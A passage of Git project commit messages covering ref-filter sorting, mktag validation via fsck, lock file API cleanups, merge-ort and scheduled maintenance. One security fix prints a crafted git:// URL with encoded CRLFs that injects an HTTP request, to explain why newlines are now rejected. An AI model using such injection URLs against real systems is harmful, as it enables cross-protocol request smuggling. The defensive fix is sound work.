get_head_description() from branch.c, 2017-01-10). I think it's
obvious from context, string and translation memory in typical
translation tools that these are the same or similar string.
1. https://en.wikipedia.org/wiki/Chinese_punctuation#Marks_similar_to_European_punctuation
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the reverse/ignore_case/version sort flags in the ref_sorting
struct into a bitfield. Having three of them was already a bit
unwieldy, but it would be even more so if another flag needed a
function like ref_sorting_icase_all() introduced in
76f9e569ad (ref-filter: apply --ignore-case to all sorting keys,
2020-05-03).
A follow-up change will introduce such a flag, so let's move this over
to a bitfield. Instead of using the usual '#define' pattern I'm using
the "enum" pattern from builtin/rebase.c's b4c8eb024a (builtin
rebase: support --quiet, 2018-09-04).
Perhaps there's a more idiomatic way of doing the "for each in list
amend mask" pattern than this "mask/on" variable combo. This function
doesn't allow us to e.g. do any arbitrary changes to the bitfield for
multiple flags, but I think in this case that's fine. The common case
is that we're calling this with a list of one.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Further amend code changed in 7c5045fc18 (ref-filter: apply fallback
refname sort only after all user sorts, 2020-05-03) to move an
assignment only used in the "else if" arm to happen there. Before that
commit the cmp_fn would be used outside of it.
We could also just skip the "cmp_fn" assignment and use
strcasecmp/strcmp directly in a ternary statement here, but this is
probably more readable.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Per the CodingGuidelines add braces to an if/else if/else chain where
only the "else" had braces. This is in preparation for a subsequent
change where the "else if" will have lines added to it.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commit taught the clone/fetch client side to reject a
git:// URL with a newline in it. Let's also catch these when fscking a
.gitmodules file, which will give an earlier warning.
Note that it would be simpler to just complain about newline in _any_
URL, but an earlier tightening for http/ftp made sure we kept allowing
newlines for unknown protocols (and this is covered in the tests). So
we'll stick to that precedent.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we connect to a git:// server, we send an initial request that
looks something like:
002dgit-upload-pack repo.git\0host=example.com
If the repo path contains a newline, then it's included literally, and
we get:
002egit-upload-pack repo
.git\0host=example.com
This works fine if you really do have a newline in your repository name;
the server side uses the pktline framing to parse the string, not
newlines. However, there are many _other_ protocols in the wild that do
parse on newlines, such as HTTP. So a carefully constructed git:// URL
can actually turn into a valid HTTP request. For example:
git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a
becomes:
0050git-upload-pack /
GET / HTTP/1.1
Host:localhost
host=localhost:1234
on the wire. Again, this isn't a problem for a real Git server, but it
does mean that feeding a malicious URL to Git (e.g., through a
submodule) can cause it to make unexpected cross-protocol requests.
Since repository names with newlines are presumably quite rare (and
indeed, we already disallow them in git-over-http), let's just disallow
them over this protocol.
Hostnames could likewise inject a newline, but this is unlikely a
problem in practice; we'd try resolving the hostname with a newline in
it, which wouldn't work. Still, it doesn't hurt to err on the side of
caution there, since we would not expect them to work in the first
place.
The ssh and local code paths are unaffected by this patch. In both cases
we're trying to run upload-pack via a shell, and will quote the newline
so that it makes it intact. An attacker can point an ssh url at an
arbitrary port, of course, but unless there's an actual ssh server
there, we'd never get as far as sending our shell command anyway. We
_could_ similarly restrict newlines in those protocols out of caution,
but there seems little benefit to doing so.
The new test here is run alongside the git-daemon tests, which cover the
same protocol, but it shouldn't actually contact the daemon at all. In
theory we could make the test more robust by setting up an actual
repository with a newline in it (so that our clone would succeed if our
new check didn't kick in). But a repo directory with newline in it is
likely not portable across all filesystems. Likewise, we could check
git-daemon's log that it was not contacted at all, but we do not
currently record the log (and anyway, it would make the test racy with
the daemon's log write). We'll just check the client-side stderr to make
sure we hit the expected code path.
Reported-by: Harold Kim <h.kim@flatt.tech>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A 3-year old test that was not testing anything useful has been
corrected.
* fc/t6030-bisect-reset-removes-auxiliary-files:
test: bisect-porcelain: fix location of files
"git worktree repair" learned to deal with the case where both the
repository and the worktree moved.
* es/worktree-repair-both-moved:
worktree: teach `repair` to fix multi-directional breakage
The ORT merge strategy learned to synthesize virtual ancestor tree
by recursively merging multiple merge bases together, just like the
recursive backend has done for years.
* en/merge-ort-recursive:
merge-ort: implement merge_incore_recursive()
merge-ort: make clear_internal_opts() aware of partial clearing
merge-ort: copy a few small helper functions from merge-recursive.c
commit: move reverse_commit_list() from merge-recursive
When a user does not tell "git pull" to use rebase or merge, the
command gives a loud message telling a user to choose between
rebase or merge but creates a merge anyway, forcing users who would
want to rebase to redo the operation. Fix an early part of this
problem by tightening the condition to give the message---there is
no reason to stop or force the user to choose between rebase or
merge if the history fast-forwards.
* fc/pull-merge-rebase:
pull: display default warning only when non-ff
pull: correct condition to trigger non-ff advice
pull: get rid of unnecessary global variable
pull: give the advice for choosing rebase/merge much later
pull: refactor fast-forward check
More "ORT" merge strategy.
* en/merge-ort-2:
merge-ort: add modify/delete handling and delayed output processing
merge-ort: add die-not-implemented stub handle_content_merge() function
merge-ort: add function grouping comments
merge-ort: add a paths_to_free field to merge_options_internal
merge-ort: add a path_conflict field to merge_options_internal
merge-ort: add a clear_internal_opts helper
merge-ort: add a few includes
The merge backend "done right" starts to emerge.
* en/merge-ort-impl:
merge-ort: free data structures in merge_finalize()
merge-ort: add implementation of record_conflicted_index_entries()
tree: enable cmp_cache_name_compare() to be used elsewhere
merge-ort: add implementation of checkout()
merge-ort: basic outline for merge_switch_to_result()
merge-ort: step 3 of tree writing -- handling subdirectories as we go
merge-ort: step 2 of tree writing -- function to create tree object
merge-ort: step 1 of tree writing -- record basenames, modes, and oids
merge-ort: have process_entries operate in a defined order
merge-ort: add a preliminary simple process_entries() implementation
merge-ort: avoid recursing into identical trees
merge-ort: record stage and auxiliary info for every path
merge-ort: compute a few more useful fields for collect_merge_info
merge-ort: avoid repeating fill_tree_descriptor() on the same tree
merge-ort: implement a very basic collect_merge_info()
merge-ort: add an err() function similar to one from merge-recursive
merge-ort: use histogram diff
merge-ort: port merge_start() from merge-recursive
merge-ort: add some high-level algorithm structure
merge-ort: setup basic internal data structures
Various improvements to the codepath that writes out pack bitmaps.
* tb/pack-bitmap: (24 commits)
pack-bitmap-write: better reuse bitmaps
pack-bitmap-write: relax unique revwalk condition
pack-bitmap-write: use existing bitmaps
pack-bitmap: factor out 'add_commit_to_bitmap()'
pack-bitmap: factor out 'bitmap_for_commit()'
pack-bitmap-write: ignore BITMAP_FLAG_REUSE
pack-bitmap-write: build fewer intermediate bitmaps
pack-bitmap.c: check reads more aggressively when loading
pack-bitmap-write: rename children to reverse_edges
t5310: add branch-based checks
commit: implement commit_list_contains()
bitmap: implement bitmap_is_subset()
pack-bitmap-write: fill bitmap with commit history
pack-bitmap-write: pass ownership of intermediate bitmaps
pack-bitmap-write: reimplement bitmap writing
ewah: add bitmap_dup() function
ewah: implement bitmap_or()
ewah: make bitmap growth less aggressive
ewah: factor out bitmap growth
rev-list: die when --test-bitmap detects a mismatch
...
The "--format=%(trailers)" mechanism gets enhanced to make it
easier to design output for machine consumption.
* ab/trailers-extra-format:
pretty format %(trailers): add a "key_value_separator"
pretty format %(trailers): add a "keyonly"
pretty-format %(trailers): fix broken standalone "valueonly"
pretty format %(trailers) doc: avoid repetition
pretty format %(trailers) test: split a long line
When the `--super-prefix` option was implmented in 74866d7579 (git: make
super-prefix option, 2016-10-07), its existence was only documented in
the manpage but not in the command's own usage string. Given that the
commit message didn't mention that this was done intentionally and given
that it's documented in the manpage, this seems like an oversight.
Add it to the usage string to fix the inconsistency.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 83bbf9b92e (mergetool--lib: improve support for vimdiff-style tool
variants, 2020-07-29) introduced a regression in the output of `git mergetool
--tool-help` and `git difftool --tool-help` [1].
In function 'show_tool_names' in git-mergetool--lib.sh, we loop over the
supported mergetools and their variants and accumulate them in the variable
'variants', separating them with a literal '\n'.
The code then uses 'echo $variants' to turn these '\n' into newlines, but this
behaviour is not portable, it just happens to work in some shells, like
dash(1)'s 'echo' builtin.
For shells in which 'echo' does not turn '\n' into newlines, the end
result is that the only tools that are shown are the existing variants
(except the last variant alphabetically), since the variants are
separated by actual newlines in '$variants' because of the several
'echo' calls in mergetools/{bc,vimdiff}::list_tool_variants.
Fix this bug by embedding an actual line feed into `variants` in
show_tool_names(). While at it, replace `sort | uniq` by `sort -u`.
To prevent future regressions, add a simple test that checks that a few
known tools are correctly shown (let's avoid counting the total number
of tools to lessen the maintenance burden when new tools are added or if
'--tool-help' learns additional logic, like hiding tools depending on
the current platform).
[1] https://lore.kernel.org/git/CADtb9DyozjgAsdFYL8fFBEWmq7iz4=prZYVUdH9W-J5CKVS4OA@mail.gmail.com/
Reported-by: Philippe Blain <levraiphilippeblain@gmail.com>
Based-on-patch-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The last test of t4129 creates a directory and expects its setgid bit
(g+s) to be off. But this makes the test fail when the parent directory
has the bit set, as setgid's state is inherited by newly created
subdirectories.
One way to solve this problem is to allow the presence of this bit when
comparing the return of `test_modebits` with the expected value. But
then we may have the same problem in the future when other tests start
using `test_modebits` on directories (currently t4129 is the only one)
and forget about setgid. Instead, let's make the helper function more
robust with respect to the state of the setgid bit in the test directory
by removing this bit from the returning value. There should be no
problem with existing callers as no one currently expects this bit to be
on.
Note that the sticky bit (+t) and the setuid bit (u+s) are not
inherited, so we don't have to worry about those.
Reported-by: Kevin Daudt <me@ikke.info>
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Further stress the --sort callback in ref-filter.c. The implementation
uses certain short-circuiting logic, let's make sure it behaves the
same way on e.g. name & version sort. Improves a test added in
aedcb7dc75 (branch.c: use 'ref-filter' APIs, 2015-09-23).
I don't think all of this output makes sense, but let's test for the
behavior as-is, we can fix bugs in it in a later commit.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There has never been a "git branch --local", this is just a typo for
"--list". Fixes a comment added in 23e714df91 (branch: roll
show_detached HEAD into regular ref_list, 2015-09-23).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
According to the guidelines in parse-options.h,
we should not end in a full stop or start with
a capital letter. Fix old error and usage
messages to match this expectation.
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"Keep it homogeneous across the repository" is in general a
guideline that can be used to converge to a good practice, but
we can be a bit more prescriptive in this case. Just like the
messages we give die(_("...")) are formatted without the final
full stop and without the initial capitalization, most of the
argument help text are already formatted that way, and we want
to encourage that as the house style.
Noticed-by: ZheNing Hu <adlternative@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that mktag has been migrated to use the fsck machinery to check
its input, it makes sense to teach it to run in the equivalent of "git
fsck"'s default mode.
For cases where mktag is used to (re)create a tag object using data
from an existing and malformed tag object, the validation may
optionally have to be loosened. Teach the command to take the
"--[no-]strict" option to do so.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to the previous commits, try to avoid peeking into the `struct
lock_file`. We also have some `struct tempfile`s -- let's avoid looking
into those as well.
Note that `do_write_index()` takes a tempfile and that when we call it,
we either have a tempfile which we can easily hand down, or we have a
lock file, from which we need to somehow obtain the internal tempfile.
So we need to leave that one instance of peeking-into. Nevertheless,
this commit leaves us not relying on exactly how the path of the
tempfile / lock file is stored internally.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to the previous commits, avoid peeking into the `struct
lock_file`. Use the lock file API instead. Note how we obtain the path
to the lock file if `fdopen_lock_file()` failed and that this is not a
problem: as documented in lockfile.h, failure to "fdopen" does not roll
back the lock file and we're free to, e.g., query it for its path.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to the previous commits, avoid peeking into the `struct
lock_file`. Use the lock file API instead.
The two functions we're calling here double-check that the tempfile is
indeed "active", which is arguably overkill considering how we took the
lock on the line immediately above. More importantly, this future-proofs
us against, e.g., other code appearing between these two lines or the
lock file and/or tempfile internals changing.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to the previous commit, avoid peeking into the `struct
lock_file`. Use the lock file API instead.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A `struct lock_file` is pretty much just a wrapper around a tempfile.
But it's easy enough to avoid relying on this. Use the wrappers that the
lock file API provides rather than peeking at the temp file or even into
*its* internals.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
p7519 measures the performance of the fsmonitor code. To do this, it
uses the installed copy of Watchman. If Watchman isn't installed, a noop
integration script is installed in its place.
When in the latter mode, it is expected that the script should not write
a "last update token": in fact, it doesn't write anything at all since
the script is blank.
Commit 33226af42b (t/perf/fsmonitor: improve error message if typoing
hook name, 2020-10-26) made sure that running 'git update-index
--fsmonitor' did not write anything to stderr, but this is not the case
when using the empty Watchman script, since Git will complain that:
$ which watchman
watchman not found
$ cat .git/hooks/fsmonitor-empty
$ git -c core.fsmonitor=.git/hooks/fsmonitor-empty update-index --fsmonitor
warning: Empty last update token.
Prior to 33226af42b, the output wasn't checked at all, which allowed
this noop mode to work. But, 33226af42b breaks p7519 when running it
without a 'watchman(1)' on your system.
Handle this by only checking that the stderr is empty only when running
with a real watchman executable. Otherwise, assert that the error
message is the expected one when running in the noop mode.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Acked-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Mark the errors mktag might emit for translation. This is a plumbing
command, but the errors it emits are intended to be human-readable.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Convert the "mktag" command to use parse-options.h instead of its own
ad-hoc argc handling. This doesn't matter much in practice since it
doesn't support any options, but removes another special-case in our
codebase, and makes it easier to add options to it in the future.
It does marginally improve the situation for programs that want to
execute git commands in a consistent manner and e.g. always use
--end-of-options. E.g. "gitaly" does that, and has a blacklist of
built-ins that don't support --end-of-options. This is one less
special case for it and other similar programs to support.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change mktag's acceptance rules to accept an empty body without an
empty line after the header again. This fixes an ancient unintended
dregression in "mktag".
When "mktag" was introduced in ec4465adb3 (Add "tag" objects that can
be used to sign other objects., 2005-04-25) the input checks were much
looser. When it was documented it 6cfec03680 (mktag: minimally update
the description., 2007-06-10) it was clearly intended for this \n to
be optional:
The message, when [it] exists, is separated by a blank line from
the header.
But then in e0aaf781f6 (mktag.c: improve verification of tagger field
and tests, 2008-03-27) this was made an error, seemingly by
accident. It was just a result of the general header checks, and all
the tests after that patch have a trailing empty line (but did not
before).
Let's allow this again, and tweak the test semantics changed in
e0aaf781f6 to remove the redundant empty line. New tests added in
previous commits of mine already added an explicit test for allowing
the empty line between header and body.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In earlier commits mktag learned to use the fsck machinery, at which
point we needed to add fsck.extraHeaderEntry so it could be as strict
about extra headers as it's been ever since it was implemented.
But it's not nice to need to switch away from "mktag" to "hash-object"
+ manual "fsck" just because you'd like to have an extra header. So
let's support turning it off by getting "fsck.*" variables from the
config.
Pedantically speaking it's still not possible to make "mktag" behave
just like "hash-object -t tag" does, since we're unconditionally going
to check the referenced object in verify_object_in_tag(), which is our
own check, and not one that exists in fsck.c.
But the spirit of "this works like fsck" is preserved, in that if you
created such a tag with "hash-object" and did a full "fsck" on the
repository it would also error out about that invalid object, it just
wouldn't emit the same message as fsck does.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move the fsck_config() function from builtin/fsck.c to fsck.[ch]. This
allows for re-using it in other tools that expose fsck logic and want
to support its configuration variables.
A logical continuation of this change would be to use a common
function for all of {fetch,receive}.fsck.* and fsck.*. See
5d477a334a (fsck (receive-pack): allow demoting errors to warnings,
2015-06-22) and my own 1362df0d41 (fetch: implement fetch.fsck.*,
2018-07-27) for the relevant code.
However, those routines want to not parse the fsck.skipList into OIDs,
but rather pass them along with the --strict option to another
process. It would be possible to refactor that whole thing so we
support e.g. a "fetch." prefix, then just keep track of the skiplist
as a filename instead of parsing it, and learn to spew that all out
from our internal structures into something we can append to the
--strict option.
But instead I'm planning to re-use this in "mktag", which'll just
re-use these "fsck.*" variables as-is.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the validation logic in "mktag" to use fsck's fsck_tag()
instead of its own custom parser. Curiously the logic for both dates
back to the same commit[1]. Let's unify them so we're not maintaining
two sets functions to verify that a tag is OK.
The behavior of fsck_tag() and the old "mktag" code being removed here
is different in few aspects.
I think it makes sense to remove some of those checks, namely:
A. fsck only cares that the timezone matches [-+][0-9]{4}. The mktag
code disallowed values larger than 1400.
Yes there's currently no timezone with a greater offset[2], but
since we allow any number of non-offical timezones (e.g. +1234)
passing this through seems fine. Git also won't break in the
future if e.g. French Polynesia decides it needs to outdo the Line
Islands when it comes to timezone extravagance.
B. fsck allows missing author names such as "tagger <email>", mktag
wouldn't, but would allow e.g. "tagger [2 spaces] <email>" (but
not "tagger [1 space] <email>"). Now we allow all of these.
C. Like B, but "mktag" disallowed spaces in the <email> part, fsck
allows it.
In some ways fsck_tag() is stricter than "mktag" was, namely:
D. fsck disallows zero-padded dates, but mktag didn't care. So
e.g. the timestamp "0000000000 +0000" produces an error now. A
test in "t1006-cat-file.sh" relied on this, it's been changed to
use "hash-object" (without fsck) instead.
There was one check I deemed worth keeping by porting it over to
fsck_tag():
E. "mktag" did not allow any custom headers, and by extension (as an
empty commit is allowed) also forbade an extra stray trailing
newline after the headers it knew about.
Add a new check in the "ignore" category to fsck and use it. This
somewhat abuses the facility added in efaba7cc77 (fsck:
optionally ignore specific fsck issues completely, 2015-06-22).
This is somewhat of hack, but probably the least invasive change
we can make here. The fsck command will shuffle these categories
around, e.g. under --strict the "info" becomes a "warn" and "warn"
becomes "error". Existing users of fsck's (and others,
e.g. index-pack) --strict option rely on this.
So we need to put something into a category that'll be ignored by
all existing users of the API. Pretending that
fsck.extraHeaderEntry=error ("ignore" by default) was set serves
to do this for us.
1. ec4465adb3 (Add "tag" objects that can be used to sign other
objects., 2005-04-25)
2. https://en.wikipedia.org/wiki/List_of_UTC_time_offsets
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This introduces no functional change, but refactors the print-out of
the hash at the end to do the same thing with less code.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This minor stylistic churn is usually something we'd avoid, but if we
don't do this then the file after changes in subsequent commits will
only have this minor style inconsistency, so let's change this while
we're at it.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the hardcoded hint of 2^12 to 0. The default strbuf hint is
perfectly fine here, and the only reason we were hardcoding it is
because it survived migration from a pre-strbuf fixed-sized buffer.
See fd17f5b5f7 (Replace all read_fd use with strbuf_read, and get rid
of it., 2007-09-10) for that migration.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests to demonstrate what "mktag" does in the face of replaced
objects.
There was an existing test for replaced objects fed to "mktag" added
in cc400f5011 (mktag: call "check_sha1_signature" with the
replacement sha1, 2009-01-23), but that one only tests a
commit->commit mapping. Not a mapping to a different type as like
we're also testing for here. We could remove the "mktag" test in
t6050-replace.sh now if the created tag wasn't being used by a
subsequent "fsck" test.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The verify_object() function in "mktag.c" is tasked with ensuring that
our tag refers to a valid object.
The existing test for this might fail because it was also testing that
"type taggg" didn't refer to a valid object type (it should be "type
tag"), or because we referred to a valid object but got the type
wrong.
Let's split these tests up, so we're testing all combinations of a
non-existing object and in invalid/wrong "type" lines.
We need to provide GIT_TEST_GETTEXT_POISON=false here because the
"invalid object type" error is emitted by
parse_loose_header_extended(), which has that message already marked
for translation. Another option would be to use test_i18ngrep, but I
prefer always running the test, not skipping it under gettext poison
testing.
I'm not testing this in combination with "git replace". That'll be
done in a subsequent commit.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change all the successful "mktag" tests to test that "hash-object"
produces the same hash for the input, and that fsck passes for
both.
This tests e.g. that "mktag" doesn't trim its input or otherwise munge
it in a way that "hash-object" doesn't.
Since we're doing an "fsck --strict" here at the end let's incorporate
the creation of the "mytag" name into this test, removing the
special-case at the end of the file.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests for a couple of whitespace edge cases around the header/body
boundary.
I consider the requirement for a blank line before the empty body a
bug, it's a long-standing regression which goes against the command's
documented behavior. This bug will be addressed in a follow-up change.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the last test in the file to run an "fsck --strict" after
creating the tag at the end.
We're just doing this for good measure to check that fsck behaves as
expected now that there's finally a reference for our valid tag. Other
tests going to be checking this elsewhere, but it's nice to cover all
the edge cases in this test to make it as self-contained as possible.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change a test added in e0aaf781f6 (mktag.c: improve verification of
tagger field and tests, 2008-03-27) to not create "mytag", which
should only be created and verified at the end in an earlier test
added in 446c6faec6 (New tests and en-passant modifications to mktag.,
2006-07-29).
While we're at it let's prevent a similar logic error from creeping
into the test by asserting that "mytag" doesn't exist before we create
it. Let's do this by moving the test to use "update-ref", instead of
our own homebrew ad-hoc refstore update.
We're not really testing for anything yet by creating the tag at the
end here. A subsequent commit will change that.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the redirection of stderr to "message" in the valid tag
test. This pattern seems to have been copy/pasted from the failure
case in 446c6faec6 (New tests and en-passant modifications to mktag.,
2006-07-29).
While I'm at it do the same for the "replace" tests. The tag creation
I'm changing here seems to have been copy/pasted from the "mktag"
tests to those tests in cc400f5011 (mktag: call
"check_sha1_signature" with the replacement sha1, 2009-01-23).
Nobody examines the contents of the resulting "message" file, so the
net result is that error messages cannot be seen in "sh t3800-mktag.sh
-v" output.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the tests amended in acb49d1cc8 (t3800: make hash-size
independent, 2019-08-18) even more to make them independent of either
SHA-1 or SHA-256.
Some of these tests were failing for the wrong reasons. The first one
being modified here would fail because the line starts with "xxxxxx"
instead of "object", the rest of the line doesn't matter.
Let's just put a valid hash on the rest of the line anyway to narrow
the test down for just the s/object/xxxxxx/ case.
The second one being modified here would fail under
GIT_TEST_DEFAULT_HASH=sha256 because <some sha-1 length garbage> is an
invalid SHA-256, but we should really be testing <some sha-256 length
garbage> when under SHA-256.
This doesn't really matter since we should be able to trust other
parts of the code to validate things in the 0-9a-f range, but let's
keep it for good measure.
There's a later test which tests an invalid SHA which looks like a
valid one, to stress the "We refuse to tag something we can't
verify[...]" logic in mktag.c.
But here we're testing for a SHA-length string which contains
characters outside of the /[0-9a-f]/i set.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace ad-hoc setup of a single commit in the "mktag" tests with our
standard helper pattern. The old setup dated back to 446c6faec6 (New
tests and en-passant modifications to mktag., 2006-07-29) before the
helper existed.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The use of a subshell dates back to e9b20943b7 (t/t3800: do not use a
temporary file to hold expected result., 2008-01-04). It's not needed
anymore, if it ever was.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the mktag documentation to compare itself to the similar
"hash-object -t tag" command. Before this someone reading the
documentation wouldn't have much of an idea what the difference
was.
Let's allude to our own validation logic, and cross-link the "mktag"
and "hash-object" documentation to aid discover-ability. A follow-up
change to migrate "mktag" to use "fsck" validation will make the part
about validation logic clearer.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git's background maintenance uses cron by default, but this is not
available on Windows. Instead, integrate with Task Scheduler.
Tasks can be scheduled using the 'schtasks' command. There are several
command-line options that can allow for some advanced scheduling, but
unfortunately these seem to all require authenticating using a password.
Instead, use the "/xml" option to pass an XML file that contains the
configuration for the necessary schedule. These XML files are based on
some that I exported after constructing a schedule in the Task Scheduler
GUI. These options only run background maintenance when the user is
logged in, and more fields are populated with the current username and
SID at run-time by 'schtasks'.
Since the GIT_TEST_MAINT_SCHEDULER environment variable allows us to
specify 'schtasks' as the scheduler, we can test the Windows-specific
logic on other platforms. Thus, add a check that the XML file written
by Git is valid when xmllint exists on the system.
Since we use a temporary file for the XML files sent to 'schtasks', we
prefix the random characters with the frequency so it is easier to
examine the proper file during tests. Instead of an exact match on the
'args' file, we 'grep' for the arguments other than the filename.
There is a deficiency in the current design. Windows has two kinds of
applications: GUI applications that start by "winmain()" and console
applications that start by "main()". Console applications are attached
to a new Console window if they are not already associated with a GUI
application. This means that every hour the scheudled task launches a
command window for the scheduled tasks. Not only is this visually
obtrusive, but it also takes focus from whatever else the user is
doing!
A simple fix would be to insert a GUI application that acts as a shim
between the scheduled task and Git. This is currently possible in Git
for Windows by setting the <Command> tag equal to
C:\Program Files\Git\git-bash.exe
with options "--hide --no-needs-console --command=cmd\git.exe"
followed by the arguments currently used. Since git-bash.exe is not
included in Windows builds of core Git, I chose to leave out this
feature. My plan is to submit a small patch to Git for Windows that
converts the use of git.exe with this use of git-bash.exe in the
short term. In the long term, we can consider creating this GUI
shim application within core Git, perhaps in contrib/.
Co-authored-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The existing mechanism for scheduling background maintenance is done
through cron. The 'crontab -e' command allows updating the schedule
while cron itself runs those commands. While this is technically
supported by macOS, it has some significant deficiencies:
1. Every run of 'crontab -e' must request elevated privileges through
the user interface. When running 'git maintenance start' from the
Terminal app, it presents a dialog box saying "Terminal.app would
like to administer your computer. Administration can include
modifying passwords, networking, and system settings." This is more
alarming than what we are hoping to achieve. If this alert had some
information about how "git" is trying to run "crontab" then we would
have some reason to believe that this dialog might be fine. However,
it also doesn't help that some scenarios just leave Git waiting for
a response without presenting anything to the user. I experienced
this when executing the command from a Bash terminal view inside
Visual Studio Code.
2. While cron initializes a user environment enough for "git config
--global --show-origin" to show the correct config file information,
it does not set up the environment enough for Git Credential Manager
Core to load credentials during a 'prefetch' task. My prefetches
against private repositories required re-authenticating through UI
pop-ups in a way that should not be required.
The solution is to switch from cron to the Apple-recommended [1]
'launchd' tool.
[1] https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html
The basics of this tool is that we need to create XML-formatted
"plist" files inside "~/Library/LaunchAgents/" and then use the
'launchctl' tool to make launchd aware of them. The plist files
include all of the scheduling information, along with the command-line
arguments split across an array of <string> tags.
For example, here is my plist file for the weekly scheduled tasks:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
<key>Label</key><string>org.git-scm.git.weekly</string>
<key>ProgramArguments</key>
<array>
<string>/usr/local/libexec/git-core/git</string>
<string>--exec-path=/usr/local/libexec/git-core</string>
<string>for-each-repo</string>
<string>--config=maintenance.repo</string>
